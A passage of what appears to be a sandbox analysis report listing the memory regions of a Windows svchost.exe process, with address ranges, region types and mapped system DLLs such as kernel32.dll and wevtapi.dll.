monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1677
start_va = 0x400000
end_va = 0x4fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 1678
start_va = 0x500000
end_va = 0x5bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1679
start_va = 0x5c0000
end_va = 0x67ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005c0000"
filename = ""
Region:
id = 1680
start_va = 0x680000
end_va = 0x6e3fff
monitored = 0
entry_point = 0x695ae0
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 1681
start_va = 0x6f0000
end_va = 0x6f6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000006f0000"
filename = ""
Region:
id = 1682
start_va = 0x700000
end_va = 0x7fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000700000"
filename = ""
Region:
id = 1683
start_va = 0x800000
end_va = 0x987fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000800000"
filename = ""
Region:
id = 1684
start_va = 0x990000
end_va = 0xb10fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000990000"
filename = ""
Region:
id = 1685
start_va = 0xb20000
end_va = 0xf1afff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000b20000"
filename = ""
Region:
id = 1686
start_va = 0xf20000
end_va = 0xf9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f20000"
filename = ""
Region:
id = 1687
start_va = 0xfa0000
end_va = 0x101ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000fa0000"
filename = ""
Region:
id = 1688
start_va = 0x1020000
end_va = 0x103ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001020000"
filename = ""
Region:
id = 1689
start_va = 0x1040000
end_va = 0x1040fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001040000"
filename = ""
Region:
id = 1690
start_va = 0x1050000
end_va = 0x1050fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001050000"
filename = ""
Region:
id = 1691
start_va = 0x1060000
end_va = 0x1066fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001060000"
filename = ""
Region:
id = 1692
start_va = 0x1070000
end_va = 0x10effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001070000"
filename = ""
Region:
id = 1693
start_va = 0x10f0000
end_va = 0x10f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010f0000"
filename = ""
Region:
id = 1694
start_va = 0x1100000
end_va = 0x11fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001100000"
filename = ""
Region:
id = 1695
start_va = 0x1300000
end_va = 0x1300fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001300000"
filename = ""
Region:
id = 1696
start_va = 0x1310000
end_va = 0x1310fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001310000"
filename = ""
Region:
id = 1697
start_va = 0x1380000
end_va = 0x13fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001380000"
filename = ""
Region:
id = 1698
start_va = 0x1400000
end_va = 0x147ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001400000"
filename = ""
Region:
id = 1699
start_va = 0x1480000
end_va = 0x1480fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001480000"
filename = ""
Region:
id = 1700
start_va = 0x1490000
end_va = 0x1490fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001490000"
filename = ""
Region:
id = 1701
start_va = 0x14f0000
end_va = 0x14f6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000014f0000"
filename = ""
Region:
id = 1702
start_va = 0x1500000
end_va = 0x15fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001500000"
filename = ""
Region:
id = 1703
start_va = 0x1600000
end_va = 0x16fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001600000"
filename = ""
Region:
id = 1704
start_va = 0x1700000
end_va = 0x177ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001700000"
filename = ""
Region:
id = 1705
start_va = 0x1780000
end_va = 0x17fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001780000"
filename = ""
Region:
id = 1706
start_va = 0x1800000
end_va = 0x18fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001800000"
filename = ""
Region:
id = 1707
start_va = 0x1900000
end_va = 0x19fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001900000"
filename = ""
Region:
id = 1708
start_va = 0x1a00000
end_va = 0x1a7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001a00000"
filename = ""
Region:
id = 1709
start_va = 0x1a90000
end_va = 0x1b8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001a90000"
filename = ""
Region:
id = 1710
start_va = 0x1c00000
end_va = 0x1cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c00000"
filename = ""
Region:
id = 1711
start_va = 0x1d00000
end_va = 0x1dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d00000"
filename = ""
Region:
id = 1712
start_va = 0x1e00000
end_va = 0x1efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e00000"
filename = ""
Region:
id = 1713
start_va = 0x2100000
end_va = 0x21fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002100000"
filename = ""
Region:
id = 1714
start_va = 0x2200000
end_va = 0x22dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 1715
start_va = 0x2300000
end_va = 0x23fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002300000"
filename = ""
Region:
id = 1716
start_va = 0x2400000
end_va = 0x2736fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1717
start_va = 0x2740000
end_va = 0x283ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002740000"
filename = ""
Region:
id = 1718
start_va = 0x2840000
end_va = 0x293ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 1719
start_va = 0x2940000
end_va = 0x2a3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002940000"
filename = ""
Region:
id = 1720
start_va = 0x2b00000
end_va = 0x2bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b00000"
filename = ""
Region:
id = 1721
start_va = 0x2c00000
end_va = 0x2cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c00000"
filename = ""
Region:
id = 1722
start_va = 0x2d00000
end_va = 0x2dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d00000"
filename = ""
Region:
id = 1723
start_va = 0x2e00000
end_va = 0x2efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e00000"
filename = ""
Region:
id = 1724
start_va = 0x2f00000
end_va = 0x2ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002f00000"
filename = ""
Region:
id = 1725
start_va = 0x3000000
end_va = 0x30fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003000000"
filename = ""
Region:
id = 1726
start_va = 0x3200000
end_va = 0x32fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003200000"
filename = ""
Region:
id = 1727
start_va = 0x3300000
end_va = 0x33fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003300000"
filename = ""
Region:
id = 1728
start_va = 0x3400000
end_va = 0x34fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003400000"
filename = ""
Region:
id = 1729
start_va = 0x3500000
end_va = 0x35fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003500000"
filename = ""
Region:
id = 1730
start_va = 0x3600000
end_va = 0x36fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003600000"
filename = ""
Region:
id = 1731
start_va = 0x3700000
end_va = 0x37fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003700000"
filename = ""
Region:
id = 1732
start_va = 0x3800000
end_va = 0x38fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003800000"
filename = ""
Region:
id = 1733
start_va = 0x3900000
end_va = 0x39fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003900000"
filename = ""
Region:
id = 1734
start_va = 0x3a00000
end_va = 0x3afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003a00000"
filename = ""
Region:
id = 1735
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1736
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 1737
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 1738
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 1739
start_va = 0x7ff60e670000
end_va = 0x7ff60e67cfff
monitored = 0
entry_point = 0x7ff60e673980
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 1740
start_va = 0x7ffc45b70000
end_va = 0x7ffc45d27fff
monitored = 0
entry_point = 0x7ffc45b75550
region_type = mapped_file
name = "wmalfxgfxdsp.dll"
filename = "\\Windows\\System32\\WMALFXGFXDSP.dll" (normalized: "c:\\windows\\system32\\wmalfxgfxdsp.dll")
Region:
id = 1741
start_va = 0x7ffc4c370000
end_va = 0x7ffc4c383fff
monitored = 0
entry_point = 0x7ffc4c371800
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 1742
start_va = 0x7ffc4c390000
end_va = 0x7ffc4c485fff
monitored = 0
entry_point = 0x7ffc4c3c9590
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 1743
start_va = 0x7ffc4dbb0000
end_va = 0x7ffc4dbc0fff
monitored = 0
entry_point = 0x7ffc4dbb2fc0
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 1744
start_va = 0x7ffc4ee90000
end_va = 0x7ffc4ef0efff
monitored = 0
entry_point = 0x7ffc4eea7110
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 1745
start_va = 0x7ffc53440000
end_va = 0x7ffc5346afff
monitored = 0
entry_point = 0x7ffc5344c3c0
region_type = mapped_file
name = "rtworkq.dll"
filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll")
Region:
id = 1746
start_va = 0x7ffc53470000
end_va = 0x7ffc5357cfff
monitored = 0
entry_point = 0x7ffc5349f420
region_type = mapped_file
name = "mfplat.dll"
filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll")
Region:
id = 1747
start_va = 0x7ffc546f0000
end_va = 0x7ffc54722fff
monitored = 0
entry_point = 0x7ffc546fae20
region_type = mapped_file
name = "wscsvc.dll"
filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll")
Region:
id = 1748
start_va = 0x7ffc54990000
end_va = 0x7ffc5499dfff
monitored = 0
entry_point = 0x7ffc54992e50
region_type = mapped_file
name = "cmintegrator.dll"
filename = "\\Windows\\System32\\cmintegrator.dll" (normalized: "c:\\windows\\system32\\cmintegrator.dll")
Region:
id = 1749
start_va = 0x7ffc549a0000
end_va = 0x7ffc549d7fff
monitored = 0
entry_point = 0x7ffc549a68f0
region_type = mapped_file
name = "wcmcsp.dll"
filename = "\\Windows\\System32\\wcmcsp.dll" (normalized: "c:\\windows\\system32\\wcmcsp.dll")
Region:
id = 1750
start_va = 0x7ffc54a10000
end_va = 0x7ffc54aa8fff
monitored = 0
entry_point = 0x7ffc54a2a090
region_type = mapped_file
name = "wcmsvc.dll"
filename = "\\Windows\\System32\\wcmsvc.dll" (normalized: "c:\\windows\\system32\\wcmsvc.dll")
Region:
id = 1751
start_va = 0x7ffc54b20000
end_va = 0x7ffc54b39fff
monitored = 0
entry_point = 0x7ffc54b22430
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 1752
start_va = 0x7ffc54ff0000
end_va = 0x7ffc55077fff
monitored = 0
entry_point = 0x7ffc55004510
region_type = mapped_file
name = "audioses.dll"
filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll")
Region:
id = 1753
start_va = 0x7ffc55080000
end_va = 0x7ffc5518afff
monitored = 0
entry_point = 0x7ffc550c2610
region_type = mapped_file
name = "audiosrv.dll"
filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll")
Region:
id = 1754
start_va = 0x7ffc55190000
end_va = 0x7ffc551a5fff
monitored = 0
entry_point = 0x7ffc551919f0
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 1755
start_va = 0x7ffc552a0000
end_va = 0x7ffc5530ffff
monitored = 0
entry_point = 0x7ffc552c2960
region_type = mapped_file
name = "mmdevapi.dll"
filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll")
Region:
id = 1756
start_va = 0x7ffc55820000
end_va = 0x7ffc55857fff
monitored = 0
entry_point = 0x7ffc55838cc0
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 1757
start_va = 0x7ffc55860000
end_va = 0x7ffc5586afff
monitored = 0
entry_point = 0x7ffc55861d30
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 1758
start_va = 0x7ffc55870000
end_va = 0x7ffc558b7fff
monitored = 0
entry_point = 0x7ffc5587a1e0
region_type = mapped_file
name = "dhcpcore6.dll"
filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll")
Region:
id = 1759
start_va = 0x7ffc57510000
end_va = 0x7ffc5756cfff
monitored = 0
entry_point = 0x7ffc57522bf0
region_type = mapped_file
name = "dhcpcore.dll"
filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll")
Region:
id = 1760
start_va = 0x7ffc576e0000
end_va = 0x7ffc57890fff
monitored = 0
entry_point = 0x7ffc57733690
region_type = mapped_file
name = "wevtsvc.dll"
filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll")
Region:
id = 1761
start_va = 0x7ffc57bb0000
end_va = 0x7ffc57ce5fff
monitored = 0
entry_point = 0x7ffc57bdf350
region_type = mapped_file
name = "wintypes.dll"
filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")
Region:
id = 1762
start_va = 0x7ffc57e70000
end_va = 0x7ffc57f37fff
monitored = 0
entry_point = 0x7ffc57eb13f0
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 1763
start_va = 0x7ffc581a0000
end_va = 0x7ffc581e9fff
monitored = 0
entry_point = 0x7ffc581aac30
region_type = mapped_file
name = "deviceaccess.dll"
filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll")
Region:
id = 1764
start_va = 0x7ffc58d40000
end_va = 0x7ffc58d50fff
monitored = 0
entry_point = 0x7ffc58d43320
region_type = mapped_file
name = "wmiclnt.dll"
filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll")
Region:
id = 1765
start_va = 0x7ffc58fa0000
end_va = 0x7ffc58fa8fff
monitored = 0
entry_point = 0x7ffc58fa19a0
region_type = mapped_file
name = "nrpsrv.dll"
filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll")
Region:
id = 1766
start_va = 0x7ffc58fb0000
end_va = 0x7ffc58fbafff
monitored = 0
entry_point = 0x7ffc58fb1cd0
region_type = mapped_file
name = "lmhsvc.dll"
filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll")
Region:
id = 1767
start_va = 0x7ffc58fd0000
end_va = 0x7ffc58fe7fff
monitored = 0
entry_point = 0x7ffc58fd5910
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 1768
start_va = 0x7ffc5a2c0000
end_va = 0x7ffc5a2d2fff
monitored = 0
entry_point = 0x7ffc5a2c2760
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 1769
start_va = 0x7ffc5a3a0000
end_va = 0x7ffc5a525fff
monitored = 0
entry_point = 0x7ffc5a3ed700
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1770
start_va = 0x7ffc5a850000
end_va = 0x7ffc5a876fff
monitored = 0
entry_point = 0x7ffc5a857940
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1771
start_va = 0x7ffc5a8a0000
end_va = 0x7ffc5a949fff
monitored = 0
entry_point = 0x7ffc5a8c7910
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 1772
start_va = 0x7ffc5abb0000
end_va = 0x7ffc5abe1fff
monitored = 0
entry_point = 0x7ffc5abc2340
region_type = mapped_file
name = "fwbase.dll"
filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll")
Region:
id = 1773
start_va = 0x7ffc5ae30000
end_va = 0x7ffc5ae53fff
monitored = 0
entry_point = 0x7ffc5ae33260
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 1774
start_va = 0x7ffc5afd0000
end_va = 0x7ffc5b0c3fff
monitored = 0
entry_point = 0x7ffc5afda960
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 1775
start_va = 0x7ffc5b240000
end_va = 0x7ffc5b24bfff
monitored = 0
entry_point = 0x7ffc5b2427e0
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 1776
start_va = 0x7ffc5b320000
end_va = 0x7ffc5b350fff
monitored = 0
entry_point = 0x7ffc5b327d10
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1777
start_va = 0x7ffc5b590000
end_va = 0x7ffc5b5aefff
monitored = 0
entry_point = 0x7ffc5b595d30
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 1778
start_va = 0x7ffc5b700000
end_va = 0x7ffc5b75bfff
monitored = 0
entry_point = 0x7ffc5b716f70
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 1779
start_va = 0x7ffc5b8d0000
end_va = 0x7ffc5b8dafff
monitored = 0
entry_point = 0x7ffc5b8d19a0
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1780
start_va = 0x7ffc5bab0000
end_va = 0x7ffc5badcfff
monitored = 0
entry_point = 0x7ffc5bac9d40
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1781
start_va = 0x7ffc5bc40000
end_va = 0x7ffc5bc95fff
monitored = 0
entry_point = 0x7ffc5bc50bf0
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 1782
start_va = 0x7ffc5bcc0000
end_va = 0x7ffc5bce8fff
monitored = 0
entry_point = 0x7ffc5bcd4530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 1783
start_va = 0x7ffc5be30000
end_va = 0x7ffc5be43fff
monitored = 0
entry_point = 0x7ffc5be352e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1784
start_va = 0x7ffc5be50000
end_va = 0x7ffc5be5efff
monitored = 0
entry_point = 0x7ffc5be53210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 1785
start_va = 0x7ffc5be60000
end_va = 0x7ffc5be6ffff
monitored = 0
entry_point = 0x7ffc5be656e0
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1786
start_va = 0x7ffc5be70000
end_va = 0x7ffc5bebafff
monitored = 0
entry_point = 0x7ffc5be735f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 1787
start_va = 0x7ffc5bec0000
end_va = 0x7ffc5bf02fff
monitored = 0
entry_point = 0x7ffc5bed4b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1788
start_va = 0x7ffc5bf10000
end_va = 0x7ffc5bf95fff
monitored = 0
entry_point = 0x7ffc5bf1d8f0
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 1789
start_va = 0x7ffc5bfa0000
end_va = 0x7ffc5c187fff
monitored = 0
entry_point = 0x7ffc5bfcba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1790
start_va = 0x7ffc5c190000
end_va = 0x7ffc5c356fff
monitored = 0
entry_point = 0x7ffc5c1edb80
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1791
start_va = 0x7ffc5cac0000
end_va = 0x7ffc5cb29fff
monitored = 0
entry_point = 0x7ffc5caf6d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 1792
start_va = 0x7ffc5e1e0000
end_va = 0x7ffc5e2a0fff
monitored = 0
entry_point = 0x7ffc5e200da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1793
start_va = 0x7ffc5e2b0000
end_va = 0x7ffc5e3cbfff
monitored = 0
entry_point = 0x7ffc5e2f02b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1794
start_va = 0x7ffc5e3e0000
end_va = 0x7ffc5e522fff
monitored = 0
entry_point = 0x7ffc5e408210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1795
start_va = 0x7ffc5e740000
end_va = 0x7ffc5e7aafff
monitored = 0
entry_point = 0x7ffc5e7590c0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1796
start_va = 0x7ffc5e850000
end_va = 0x7ffc5e8ecfff
monitored = 0
entry_point = 0x7ffc5e8578a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1797
start_va = 0x7ffc5e8f0000
end_va = 0x7ffc5e94afff
monitored = 0
entry_point = 0x7ffc5e9038b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1798
start_va = 0x7ffc5e950000
end_va = 0x7ffc5e957fff
monitored = 0
entry_point = 0x7ffc5e951ea0
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1799
start_va = 0x7ffc5e960000
end_va = 0x7ffc5eab5fff
monitored = 0
entry_point = 0x7ffc5e96a8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1800
start_va = 0x7ffc5ec20000
end_va = 0x7ffc5ecc6fff
monitored = 0
entry_point = 0x7ffc5ec358d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1801
start_va = 0x7ffc5ecd0000
end_va = 0x7ffc5ed7cfff
monitored = 0
entry_point = 0x7ffc5ece81a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1802
start_va = 0x7ffc5f2c0000
end_va = 0x7ffc5f53cfff
monitored = 0
entry_point = 0x7ffc5f394970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 1803
start_va = 0x7ffc5f540000
end_va = 0x7ffc5f6c5fff
monitored = 0
entry_point = 0x7ffc5f58ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1804
start_va = 0x7ffc5f760000
end_va = 0x7ffc5f806fff
monitored = 0
entry_point = 0x7ffc5f76b4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1805
start_va = 0x7ffc5f810000
end_va = 0x7ffc5f9d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1888
start_va = 0x1200000
end_va = 0x126efff
monitored = 0
entry_point = 0x12207c0
region_type = mapped_file
name = "services.exe"
